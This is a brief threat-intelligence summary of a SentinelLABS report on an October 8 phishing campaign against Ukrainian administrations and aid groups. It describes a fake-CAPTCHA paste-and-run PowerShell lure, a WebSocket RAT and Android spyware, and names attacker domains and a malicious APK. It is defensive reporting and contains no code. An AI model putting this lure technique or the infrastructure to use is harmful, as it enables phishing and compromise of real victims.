Overview
- SentinelLABS and the Digital Security Lab of Ukraine detailed a one‑day October 8 campaign that targeted staff at Ukrainian regional administrations as well as ICRC, UNICEF and the Norwegian Refugee Council.
- Emails impersonating the Ukrainian President’s Office carried weaponized PDFs that sent users to zoomconference.app, where a bogus CAPTCHA instructed them to copy and paste a token that executed a PowerShell command.
- The infection chain delivered an obfuscated downloader, a reconnaissance profiler and a WebSocket‑based RAT capable of remote command execution and data exfiltration, with the RAT hosted on Russian infrastructure.
- Operators pre‑registered domains months in advance, kept the public‑facing site active only on October 8 and maintained back‑end servers to manage any compromised hosts.
- Researchers linked a related Android spyware cluster distributing princess.apk from princess-mens.click and noted overlaps with GTIG‑reported ColdRiver techniques and Russia/Belarus hosting indicators, while stopping short of attribution and urging defenses against paste‑and‑run lures, PowerShell abuse and suspicious WebSocket traffic.